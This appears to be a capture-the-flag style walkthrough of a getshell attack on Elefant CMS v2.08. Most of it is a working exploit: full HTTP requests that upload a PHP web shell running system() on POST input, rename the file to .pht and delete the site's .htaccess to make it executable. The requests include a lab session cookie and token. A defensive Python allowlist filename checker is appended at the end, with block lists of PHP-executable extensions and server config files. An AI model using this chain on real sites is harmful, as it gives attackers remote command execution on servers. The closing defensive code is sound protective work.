Elefant CMS v2.08 getshell walkthrough (not CVE-2017-20063)

A new vulnerability following CVE-2017-20063; CVE-2017-20063 only affects version 1.3.

 

Vulnerable code: apps/filemanager/upload/drop.php


First, upload a file:

127.0.0.1/filemanager


Then rename it to 99.pht


You can also test uploading a PHP file with the following request:

This upload did not succeed for me; the method above is recommended:


POST /filemanager/upload/drop HTTP/1.1
Host: eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Content-Length: 498
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
content-type: multipart/form-data; boundary=------multipartformboundary1685373759841
Accept: */*
Origin: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Referer: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com/blocks/edit?id=members&return=/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685254512,1685372961; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1685373004; elefant_user=eqg5f048u4lou6jouog12q5es0; elefant_update_checked=1; elefant_last_page=%2Fuser
Connection: close

--------multipartformboundary1685373759841
Content-Disposition: form-data; name="path"


--------multipartformboundary1685373759841
Content-Disposition: form-data; name="token"

ed50295e5e66b7012faaea35359a60cb
--------multipartformboundary1685373759841
Content-Disposition: form-data; name="file"; filename="11a.php"
Content-Type: xxx

GIF89a
<script language="pHp">phpinfo()</script>
<?php phpinfo();?>
<?php system($_POST['p']);?>

--------multipartformboundary1685373759841--

 

 

Next, use the API to delete the .htaccess in the site root:

/filemanager/api/rm/.htaccess

The full request is as follows:

POST /filemanager/api/rm/.htaccess HTTP/1.1
Host: eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Content-Length: 511
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
content-type: multipart/form-data; boundary=------multipartformboundary1685373759841
Accept: */*
Origin: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Referer: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com/blocks/edit?id=members&return=/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685254512,1685372961; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1685373004; elefant_user=eqg5f048u4lou6jouog12q5es0; elefant_update_checked=1; elefant_last_page=%2Fuser
Connection: close

After deletion, the success indicator is shown:


A message reports that the rewrite (pseudo-static) rule was deleted successfully:


Visit the renamed .pht file, /files/31.pht,

to obtain the shell:

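Added defensive example (not Elefant's own code): an allowlist-based filename check in Python that applies one rule to upload, rename and delete, the three operations the walkthrough chains together (uploading 11a.php, renaming to 99.pht, removing .htaccess). The allowed-extension set and the helper names are assumptions for this example.

```python
import os
import re

# Extensions the file manager accepts. This allowlist is an assumption for the
# example, not Elefant's own configuration; anything not listed is refused.
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png", "pdf", "txt", "zip"}

# Extensions a PHP handler may execute, named here only for a precise reason
# string. A blocklist on its own is what lets 99.pht past a check that knows
# only about .php; the decision below is made by the allowlist.
PHP_EXECUTABLE = {"php", "pht", "phtml", "phar", "php3", "php4", "php5", "php7", "phps"}

# Web server configuration files that a file manager must never create,
# rename or delete on behalf of a user.
PROTECTED_NAMES = {".htaccess", ".htpasswd", ".user.ini", "web.config"}

# Plain name: starts with a letter or digit, so dotfiles are excluded as well.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$")


def check_filename(name: str) -> tuple[bool, str]:
    """Decide whether a name may be used for upload, rename or delete.

    Returns (allowed, reason). The same check covers all three operations,
    because the walkthrough bypasses upload filtering by renaming afterwards
    and bypasses .htaccess protection by deleting it.
    """
    base = os.path.basename(name.replace("\\", "/"))
    if base != name:
        return False, "path components not allowed"
    if base.lower() in PROTECTED_NAMES:
        return False, "server configuration file"
    if not SAFE_NAME.match(base):
        return False, "unsafe characters or leading dot"
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    # Every segment after the first is checked, so "x.php.txt" is refused as
    # well; Apache can apply handlers to inner extensions.
    for ext in parts[1:]:
        if ext in PHP_EXECUTABLE:
            return False, f"executable extension .{ext}"
        if ext not in ALLOWED_EXTENSIONS:
            return False, f"extension .{ext} not in allowlist"
    return True, "ok"


if __name__ == "__main__":
    # Names taken from the walkthrough above, plus one legitimate upload.
    for n in ("11a.php", "99.pht", "31.pht", ".htaccess", "photo.png"):
        print(n, check_filename(n))
```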